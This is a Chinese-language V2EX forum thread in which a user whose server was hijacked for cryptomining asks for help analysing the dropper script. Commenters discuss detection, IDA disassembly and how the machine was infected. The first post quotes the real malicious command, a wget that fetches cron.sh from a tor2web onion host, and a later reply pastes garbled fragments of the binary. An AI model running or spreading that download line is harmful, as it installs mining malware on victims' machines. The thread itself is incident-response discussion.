服务器被挖矿，麻烦帮我看看脚本

2019-07-15 15:03:20 +08:00

wangking

wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh

能看懂中间是 base64 加密，开头和结尾是什么？

5817 次点击

所在节点

Linux

14 条回复

bumz

2019-07-15 15:18:50 +08:00

tor2web

隐藏的还挺好

AllenBigBear

2019-07-15 15:30:00 +08:00

萌新请教，怎么发现服务器被挖矿的哈？

15651980765

2019-07-15 15:32:08 +08:00

@AllenBigBear = =服务商会发短信告诉你你的服务器 CPU 运行异常，长时间冲高。

wangking

2019-07-15 15:42:16 +08:00

@AllenBigBear 我们是监控报的，上来看，发现有异常进程

wangking

2019-07-15 15:49:46 +08:00

@bumz 这个开头和结尾是什么鬼，大佬了解吗

AllenBigBear

2019-07-15 15:59:27 +08:00

@15651980765 哦哦，好的，谢谢！

shinodajmk

2019-07-15 16:01:34 +08:00

服务器挖矿，这收益率是很低的。CPU 扛矿。除非你是 GPU 型机子，很棒帮

dlsflh

2019-07-15 16:19:46 +08:00

@shinodajmk 你要不去看一下 XMR ？

defunct9

2019-07-15 17:24:08 +08:00

s.bsst
6!8-
#C@>
cp -pf /H
tmp/.00 CE
/lib/sys!emd !
-log!in6r
; toucpxhd

defunct9

2019-07-15 17:24:54 +08:00

这是个前置的，一旦运行估计就开始下东西。安装，运行

wangking

2019-07-15 17:45:50 +08:00

@defunct9 找了个编辑器，打开就是这一堆的东西，看不懂。，

moonfly

2019-07-15 19:47:46 +08:00

二进制程序要反汇编，拖到 IDA 里看看，没加密混淆的话，应该能看出大致的程序运行逻辑，如果确定是挖矿木马，那就没啥分析的价值了！顶多学学它的自启动脚本怎么写的！

话说服务器被挖矿，第一件事情不是应该查是如何被挂的马吗？

nnnToTnnn

2019-07-16 08:56:20 +08:00

@moonfly 可能是破解的 xshell,或者是在非官网下载又不验证 hash 值

wangking

2019-07-16 10:13:03 +08:00

@moonfly 可能是历史遗留原因。

第 1 页／共 1 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/583093

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.